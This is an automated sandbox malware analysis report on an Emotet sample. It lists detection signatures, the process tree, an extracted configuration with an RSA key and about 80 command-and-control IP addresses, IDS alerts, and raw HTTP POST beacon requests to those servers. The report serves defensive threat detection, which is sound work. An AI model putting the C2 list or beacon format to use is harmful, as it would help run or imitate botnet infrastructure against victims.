Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
75A0VTo3z9.exe

Overview

General Information

Sample name:75A0VTo3z9.exe
renamed because original name is a hash value
Original sample name:48d8297b4a9debaa7b777f877019ce73777fbaed.exe
Analysis ID:1553817
MD5:921577c536c85169a26caf0b69a6d82d
SHA1:48d8297b4a9debaa7b777f877019ce73777fbaed
SHA256:4fc5f4f5462c4a65137c2121d4af6faae8e39aeb164842073a7e361527e879e5
Tags:exeuser-NDA0E
Infos:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Emotet
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops executables to the windows directory (C:\Windows) and starts them
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Connects to several IPs in different countries
Contains functionality to enumerate running services
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file does not import any functions
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Communication To Uncommon Destination Ports
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 75A0VTo3z9.exe (PID: 2556 cmdline: "C:\Users\user\Desktop\75A0VTo3z9.exe" MD5: 921577C536C85169A26CAF0B69A6D82D)
    • wpbcreds.exe (PID: 3788 cmdline: "C:\Windows\SysWOW64\fwcfg\wpbcreds.exe" MD5: 921577C536C85169A26CAF0B69A6D82D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
EmotetWhile Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets.It is always stealing information from victims but what the criminal gang behind it did, was to open up another business channel by selling their infrastructure delivering additional malicious software. From malware analysts it has been classified into epochs depending on command and control, payloads, and delivery solutions which change over time.Emotet had been taken down by authorities in January 2021, though it appears to have sprung back to life in November 2021.
  • GOLD CABIN
  • MUMMY SPIDER
  • Mealybug
https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet
{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB", "C2 list": ["177.23.7.151:80", "95.85.33.23:8080", "192.232.229.54:7080", "46.101.58.37:8080", "70.32.115.157:8080", "111.67.12.221:8080", "98.13.75.196:80", "5.196.35.138:7080", "1.226.84.243:8080", "12.162.84.2:8080", "87.106.46.107:8080", "60.93.23.51:80", "51.255.165.160:8080", "45.33.77.42:8080", "209.236.123.42:8080", "219.92.13.25:80", "217.13.106.14:8080", "170.81.48.2:80", "202.29.239.162:443", "83.169.21.32:7080", "37.187.161.206:8080", "68.183.190.199:8080", "216.47.196.104:80", "104.131.41.185:8080", "177.144.130.105:443", "51.38.124.206:80", "51.75.33.127:80", "5.189.178.202:8080", "200.127.14.97:80", "202.134.4.210:7080", "186.103.141.250:443", "12.163.208.58:80", "190.115.18.139:8080", "181.129.96.162:8080", "46.105.114.137:8080", "45.46.37.97:80", "35.143.99.174:80", "185.94.252.27:443", "188.135.15.49:80", "177.74.228.34:80", "51.15.7.189:80", "105.209.235.113:8080", "212.71.237.140:8080", "24.232.228.233:80", "191.191.23.135:80", "101.187.81.254:80", "185.94.252.12:80", "152.169.22.67:80", "185.183.16.47:80", "128.92.203.42:80", "192.81.38.31:80", "138.97.60.140:8080", "64.201.88.132:80", "181.30.61.163:443", "178.211.45.66:8080", "189.2.177.210:443", "68.183.170.114:8080", "85.214.26.7:8080", "177.73.0.98:443", "70.32.84.74:8080", "201.213.177.139:80", "46.43.2.95:8080", "50.28.51.143:8080", "190.188.245.242:80", "177.129.17.170:443", "178.250.54.208:8080", "137.74.106.111:7080", "177.144.130.105:8080", "51.15.7.145:80", "192.241.143.52:8080", "138.97.60.141:7080", "94.176.234.118:443", "82.76.111.249:443", "190.24.243.186:80", "174.118.202.24:443", "149.202.72.142:7080", "70.169.17.134:80", "172.104.169.32:8080", "191.182.6.118:80", "213.197.182.158:8080", "50.121.220.50:80", "62.84.75.50:80", "77.238.212.227:80"]}
SourceRuleDescriptionAuthorStrings
75A0VTo3z9.exeJoeSecurity_EmotetYara detected EmotetJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000001.00000000.2040983750.00000000000B1000.00000020.00000001.01000000.00000006.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000001.00000002.3288300959.00000000000B1000.00000020.00000001.01000000.00000006.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000000.00000000.2039200708.00000000000B1000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            SourceRuleDescriptionAuthorStrings
            1.2.wpbcreds.exe.b0000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              1.0.wpbcreds.exe.b0000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                0.0.75A0VTo3z9.exe.b0000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  0.2.75A0VTo3z9.exe.b0000.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 95.85.33.23, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Windows\SysWOW64\fwcfg\wpbcreds.exe, Initiated: true, ProcessId: 3788, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49705
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-11T18:19:48.724884+010020229301A Network Trojan was detected4.175.87.197443192.168.2.549707TCP
                    2024-11-11T18:20:26.471992+010020229301A Network Trojan was detected4.175.87.197443192.168.2.549982TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-11T18:19:44.132415+010020308681A Network Trojan was detected192.168.2.549704177.23.7.15180TCP
                    2024-11-11T18:19:55.423980+010020308681A Network Trojan was detected192.168.2.54970595.85.33.238080TCP
                    2024-11-11T18:20:00.010809+010020308681A Network Trojan was detected192.168.2.549805192.232.229.547080TCP
                    2024-11-11T18:20:11.143464+010020308681A Network Trojan was detected192.168.2.54982746.101.58.378080TCP
                    2024-11-11T18:20:23.732625+010020308681A Network Trojan was detected192.168.2.54991070.32.115.1578080TCP
                    2024-11-11T18:20:26.817308+010020308681A Network Trojan was detected192.168.2.549983111.67.12.2218080TCP
                    2024-11-11T18:20:38.793014+010020308681A Network Trojan was detected192.168.2.54998498.13.75.19680TCP
                    2024-11-11T18:20:42.795138+010020308681A Network Trojan was detected192.168.2.5499855.196.35.1387080TCP
                    2024-11-11T18:20:54.808412+010020308681A Network Trojan was detected192.168.2.54998674.58.215.22680TCP
                    2024-11-11T18:21:06.802079+010020308681A Network Trojan was detected192.168.2.549989186.70.127.1998090TCP
                    2024-11-11T18:21:19.028845+010020308681A Network Trojan was detected192.168.2.5499901.226.84.2438080TCP
                    2024-11-11T18:21:31.114013+010020308681A Network Trojan was detected192.168.2.54999112.162.84.28080TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-11T18:19:44.132415+010028543881Malware Command and Control Activity Detected192.168.2.549704177.23.7.15180TCP
                    2024-11-11T18:19:55.423980+010028543881Malware Command and Control Activity Detected192.168.2.54970595.85.33.238080TCP
                    2024-11-11T18:20:00.010809+010028543881Malware Command and Control Activity Detected192.168.2.549805192.232.229.547080TCP
                    2024-11-11T18:20:11.143464+010028543881Malware Command and Control Activity Detected192.168.2.54982746.101.58.378080TCP
                    2024-11-11T18:20:23.732625+010028543881Malware Command and Control Activity Detected192.168.2.54991070.32.115.1578080TCP
                    2024-11-11T18:20:26.817308+010028543881Malware Command and Control Activity Detected192.168.2.549983111.67.12.2218080TCP
                    2024-11-11T18:20:38.793014+010028543881Malware Command and Control Activity Detected192.168.2.54998498.13.75.19680TCP
                    2024-11-11T18:20:54.808412+010028543881Malware Command and Control Activity Detected192.168.2.54998674.58.215.22680TCP
                    2024-11-11T18:21:06.802079+010028543881Malware Command and Control Activity Detected192.168.2.549989186.70.127.1998090TCP
                    2024-11-11T18:21:19.028845+010028543881Malware Command and Control Activity Detected192.168.2.5499901.226.84.2438080TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 75A0VTo3z9.exeAvira: detected
                    Source: 75A0VTo3z9.exeMalware Configuration Extractor: Emotet {"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB", "C2 list": ["177.23.7.151:80", "95.85.33.23:8080", "192.232.229.54:7080", "46.101.58.37:8080", "70.32.115.157:8080", "111.67.12.221:8080", "98.13.75.196:80", "5.196.35.138:7080", "1.226.84.243:8080", "12.162.84.2:8080", "87.106.46.107:8080", "60.93.23.51:80", "51.255.165.160:8080", "45.33.77.42:8080", "209.236.123.42:8080", "219.92.13.25:80", "217.13.106.14:8080", "170.81.48.2:80", "202.29.239.162:443", "83.169.21.32:7080", "37.187.161.206:8080", "68.183.190.199:8080", "216.47.196.104:80", "104.131.41.185:8080", "177.144.130.105:443", "51.38.124.206:80", "51.75.33.127:80", "5.189.178.202:8080", "200.127.14.97:80", "202.134.4.210:7080", "186.103.141.250:443", "12.163.208.58:80", "190.115.18.139:8080", "181.129.96.162:8080", "46.105.114.137:8080", "45.46.37.97:80", "35.143.99.174:80", "185.94.252.27:443", "188.135.15.49:80", "177.74.228.34:80", "51.15.7.189:80", "105.209.235.113:8080", "212.71.237.140:8080", "24.232.228.233:80", "191.191.23.135:80", "101.187.81.254:80", "185.94.252.12:80", "152.169.22.67:80", "185.183.16.47:80", "128.92.203.42:80", "192.81.38.31:80", "138.97.60.140:8080", "64.201.88.132:80", "181.30.61.163:443", "178.211.45.66:8080", "189.2.177.210:443", "68.183.170.114:8080", "85.214.26.7:8080", "177.73.0.98:443", "70.32.84.74:8080", "201.213.177.139:80", "46.43.2.95:8080", "50.28.51.143:8080", "190.188.245.242:80", "177.129.17.170:443", "178.250.54.208:8080", "137.74.106.111:7080", "177.144.130.105:8080", "51.15.7.145:80", "192.241.143.52:8080", "138.97.60.141:7080", "94.176.234.118:443", "82.76.111.249:443", "190.24.243.186:80", "174.118.202.24:443", "149.202.72.142:7080", "70.169.17.134:80", "172.104.169.32:8080", "191.182.6.118:80", "213.197.182.158:8080", "50.121.220.50:80", "62.84.75.50:80", "77.238.212.227:80"]}
                    Source: 75A0VTo3z9.exeReversingLabs: Detection: 76%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 89.4% probability
                    Source: 75A0VTo3z9.exeJoe Sandbox ML: detected
                    Source: 75A0VTo3z9.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 75A0VTo3z9.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\75A0VTo3z9.exeCode function: 0_2_000B36A0 FindNextFileW,FindNextFileW,FindFirstFileW,FindFirstFileW,_snwprintf,GetProcessHeap,HeapFree,_snwprintf,GetProcessHeap,HeapFree,FindClose,FindClose,0_2_000B36A0

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.5:49705 -> 95.85.33.23:8080
                    Source: Network trafficSuricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.5:49705 -> 95.85.33.23:8080
                    Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.5:49805 -> 192.232.229.54:7080
                    Source: Network trafficSuricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.5:49805 -> 192.232.229.54:7080
                    Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.5:49827 -> 46.101.58.37:8080
                    Source: Network trafficSuricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.5:49827 -> 46.101.58.37:8080
                    Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.5:49704 -> 177.23.7.151:80
                    Source: Network trafficSuricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.5:49704 -> 177.23.7.151:80
                    Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.5:49985 -> 5.196.35.138:7080
                    Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.5:49983 -> 111.67.12.221:8080
                    Source: Network trafficSuricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.5:49983 -> 111.67.12.221:8080
                    Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.5:49989 -> 186.70.127.199:8090
                    Source: Network trafficSuricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.5:49989 -> 186.70.127.199:8090
                    Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.5:49991 -> 12.162.84.2:8080
                    Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.5:49990 -> 1.226.84.243:8080
                    Source: Network trafficSuricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.5:49990 -> 1.226.84.243:8080
                    Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.5:49910 -> 70.32.115.157:8080
                    Source: Network trafficSuricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.5:49910 -> 70.32.115.157:8080
                    Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.5:49984 -> 98.13.75.196:80
                    Source: Network trafficSuricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.5:49984 -> 98.13.75.196:80
                    Source: Network trafficSuricata IDS: 2030868 - Severity 1 - ET MALWARE Win32/Emotet CnC Activity (POST) M10 : 192.168.2.5:49986 -> 74.58.215.226:80
                    Source: Network trafficSuricata IDS: 2854388 - Severity 1 - ETPRO MALWARE Win32/Emotet CnC Activity (POST) M13 : 192.168.2.5:49986 -> 74.58.215.226:80
                    Source: Malware configuration extractorIPs: 177.23.7.151:80
                    Source: Malware configuration extractorIPs: 95.85.33.23:8080
                    Source: Malware configuration extractorIPs: 192.232.229.54:7080
                    Source: Malware configuration extractorIPs: 46.101.58.37:8080
                    Source: Malware configuration extractorIPs: 70.32.115.157:8080
                    Source: Malware configuration extractorIPs: 111.67.12.221:8080
                    Source: Malware configuration extractorIPs: 98.13.75.196:80
                    Source: Malware configuration extractorIPs: 5.196.35.138:7080
                    Source: Malware configuration extractorIPs: 1.226.84.243:8080
                    Source: Malware configuration extractorIPs: 12.162.84.2:8080
                    Source: Malware configuration extractorIPs: 87.106.46.107:8080
                    Source: Malware configuration extractorIPs: 60.93.23.51:80
                    Source: Malware configuration extractorIPs: 51.255.165.160:8080
                    Source: Malware configuration extractorIPs: 45.33.77.42:8080
                    Source: Malware configuration extractorIPs: 209.236.123.42:8080
                    Source: Malware configuration extractorIPs: 219.92.13.25:80
                    Source: Malware configuration extractorIPs: 217.13.106.14:8080
                    Source: Malware configuration extractorIPs: 170.81.48.2:80
                    Source: Malware configuration extractorIPs: 202.29.239.162:443
                    Source: Malware configuration extractorIPs: 83.169.21.32:7080
                    Source: Malware configuration extractorIPs: 37.187.161.206:8080
                    Source: Malware configuration extractorIPs: 68.183.190.199:8080
                    Source: Malware configuration extractorIPs: 216.47.196.104:80
                    Source: Malware configuration extractorIPs: 104.131.41.185:8080
                    Source: Malware configuration extractorIPs: 177.144.130.105:443
                    Source: Malware configuration extractorIPs: 51.38.124.206:80
                    Source: Malware configuration extractorIPs: 51.75.33.127:80
                    Source: Malware configuration extractorIPs: 5.189.178.202:8080
                    Source: Malware configuration extractorIPs: 200.127.14.97:80
                    Source: Malware configuration extractorIPs: 202.134.4.210:7080
                    Source: Malware configuration extractorIPs: 186.103.141.250:443
                    Source: Malware configuration extractorIPs: 12.163.208.58:80
                    Source: Malware configuration extractorIPs: 190.115.18.139:8080
                    Source: Malware configuration extractorIPs: 181.129.96.162:8080
                    Source: Malware configuration extractorIPs: 46.105.114.137:8080
                    Source: Malware configuration extractorIPs: 45.46.37.97:80
                    Source: Malware configuration extractorIPs: 35.143.99.174:80
                    Source: Malware configuration extractorIPs: 185.94.252.27:443
                    Source: Malware configuration extractorIPs: 188.135.15.49:80
                    Source: Malware configuration extractorIPs: 177.74.228.34:80
                    Source: Malware configuration extractorIPs: 51.15.7.189:80
                    Source: Malware configuration extractorIPs: 105.209.235.113:8080
                    Source: Malware configuration extractorIPs: 212.71.237.140:8080
                    Source: Malware configuration extractorIPs: 24.232.228.233:80
                    Source: Malware configuration extractorIPs: 191.191.23.135:80
                    Source: Malware configuration extractorIPs: 101.187.81.254:80
                    Source: Malware configuration extractorIPs: 185.94.252.12:80
                    Source: Malware configuration extractorIPs: 152.169.22.67:80
                    Source: Malware configuration extractorIPs: 185.183.16.47:80
                    Source: Malware configuration extractorIPs: 128.92.203.42:80
                    Source: Malware configuration extractorIPs: 192.81.38.31:80
                    Source: Malware configuration extractorIPs: 138.97.60.140:8080
                    Source: Malware configuration extractorIPs: 64.201.88.132:80
                    Source: Malware configuration extractorIPs: 181.30.61.163:443
                    Source: Malware configuration extractorIPs: 178.211.45.66:8080
                    Source: Malware configuration extractorIPs: 189.2.177.210:443
                    Source: Malware configuration extractorIPs: 68.183.170.114:8080
                    Source: Malware configuration extractorIPs: 85.214.26.7:8080
                    Source: Malware configuration extractorIPs: 177.73.0.98:443
                    Source: Malware configuration extractorIPs: 70.32.84.74:8080
                    Source: Malware configuration extractorIPs: 201.213.177.139:80
                    Source: Malware configuration extractorIPs: 46.43.2.95:8080
                    Source: Malware configuration extractorIPs: 50.28.51.143:8080
                    Source: Malware configuration extractorIPs: 190.188.245.242:80
                    Source: Malware configuration extractorIPs: 177.129.17.170:443
                    Source: Malware configuration extractorIPs: 178.250.54.208:8080
                    Source: Malware configuration extractorIPs: 137.74.106.111:7080
                    Source: Malware configuration extractorIPs: 177.144.130.105:8080
                    Source: Malware configuration extractorIPs: 51.15.7.145:80
                    Source: Malware configuration extractorIPs: 192.241.143.52:8080
                    Source: Malware configuration extractorIPs: 138.97.60.141:7080
                    Source: Malware configuration extractorIPs: 94.176.234.118:443
                    Source: Malware configuration extractorIPs: 82.76.111.249:443
                    Source: Malware configuration extractorIPs: 190.24.243.186:80
                    Source: Malware configuration extractorIPs: 174.118.202.24:443
                    Source: Malware configuration extractorIPs: 149.202.72.142:7080
                    Source: Malware configuration extractorIPs: 70.169.17.134:80
                    Source: Malware configuration extractorIPs: 172.104.169.32:8080
                    Source: Malware configuration extractorIPs: 191.182.6.118:80
                    Source: Malware configuration extractorIPs: 213.197.182.158:8080
                    Source: Malware configuration extractorIPs: 50.121.220.50:80
                    Source: Malware configuration extractorIPs: 62.84.75.50:80
                    Source: Malware configuration extractorIPs: 77.238.212.227:80
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 7080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 7080
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 8090
                    Source: unknownNetwork traffic detected: IP country count 28
                    Source: global trafficTCP traffic: 192.168.2.5:49705 -> 95.85.33.23:8080
                    Source: global trafficTCP traffic: 192.168.2.5:49827 -> 46.101.58.37:8080
                    Source: global trafficTCP traffic: 192.168.2.5:49910 -> 70.32.115.157:8080
                    Source: global trafficTCP traffic: 192.168.2.5:49983 -> 111.67.12.221:8080
                    Source: global trafficTCP traffic: 192.168.2.5:49985 -> 5.196.35.138:7080
                    Source: global trafficTCP traffic: 192.168.2.5:49989 -> 186.70.127.199:8090
                    Source: global trafficTCP traffic: 192.168.2.5:49990 -> 1.226.84.243:8080
                    Source: global trafficTCP traffic: 192.168.2.5:49991 -> 12.162.84.2:8080
                    Source: Joe Sandbox ViewIP Address: 191.182.6.118 191.182.6.118
                    Source: Joe Sandbox ViewIP Address: 94.176.234.118 94.176.234.118
                    Source: Joe Sandbox ViewIP Address: 177.73.0.98 177.73.0.98
                    Source: Joe Sandbox ViewASN Name: CLAROSABR CLAROSABR
                    Source: Joe Sandbox ViewASN Name: CLAROSABR CLAROSABR
                    Source: Joe Sandbox ViewASN Name: RACKRAYUABRakrejusLT RACKRAYUABRakrejusLT
                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.5:49707
                    Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.5:49982
                    Source: global trafficHTTP traffic detected: POST /3wUCpKO4/JTPGcoppPVNecd/kZIb0JsfBL4uOV/ggtdXz/vA8qWBr8CgPGl/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 177.23.7.151/3wUCpKO4/JTPGcoppPVNecd/kZIb0JsfBL4uOV/ggtdXz/vA8qWBr8CgPGl/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=------------c1rFprRPYfa1Host: 177.23.7.151Content-Length: 4676Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /0POplCNbRBZ4or4A/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 95.85.33.23/0POplCNbRBZ4or4A/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------------------czaXol8AYsgziFOrfodCHost: 95.85.33.23:8080Content-Length: 4676Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /xbe2duP8y5opIK2l/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 192.232.229.54/xbe2duP8y5opIK2l/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------------------obA8YhSs1fssjgUX6Gq8Host: 192.232.229.54:7080Content-Length: 4660Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /Eas06APQiAXQBBRWWCh/qJFO2/PQe4JvrKGH4u/1GsN8/Z070VvHPjARxs33T/WdATQgVfQYq/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 46.101.58.37/Eas06APQiAXQBBRWWCh/qJFO2/PQe4JvrKGH4u/1GsN8/Z070VvHPjARxs33T/WdATQgVfQYq/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=-----------------------mZOPwTXQDnkMiVqVaBOtPqFHost: 46.101.58.37:8080Content-Length: 4660Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /K3KZ1n42NvAQNZg4/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 70.32.115.157/K3KZ1n42NvAQNZg4/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------------------cAGwb81TBde1OYDGtOzaHost: 70.32.115.157:8080Content-Length: 4676Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /6o1iAIEQeDHOWcsR/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 111.67.12.221/6o1iAIEQeDHOWcsR/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=--------------------3PCRf3772wYwDZo4k5J9Host: 111.67.12.221:8080Content-Length: 4660Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /H9yA2oaqlws/3MmQ3/8a6D9V6hboQjs/hy9t/w9y8YK55Q41pW7E/9tuVBGyVVtFzFYd/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 98.13.75.196/H9yA2oaqlws/3MmQ3/8a6D9V6hboQjs/hy9t/w9y8YK55Q41pW7E/9tuVBGyVVtFzFYd/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------------cu2hEobt4tvmI76Host: 98.13.75.196Content-Length: 4644Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /w3vsOgeeY9NPp/vwyrTa5/wI8W1JV8dTW/ZXRlXdiTaaxugNmh5/TPITs41XN0Wtx9UMJWd/VRGGqhut2ut9hId/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 5.196.35.138/w3vsOgeeY9NPp/vwyrTa5/wI8W1JV8dTW/ZXRlXdiTaaxugNmh5/TPITs41XN0Wtx9UMJWd/VRGGqhut2ut9hId/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=-----------------TO1T7raTR7e4z8n5IHost: 5.196.35.138:7080Content-Length: 4644Cache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /yhwXMM7xdxH/yuXOhXg/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveReferer: 74.58.215.226/yhwXMM7xdxH/yuXOhXg/Upgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=---------------l83eJPEldOxklGMHost: 74.58.215.226Content-Length: 4644Cache-Control: no-cache
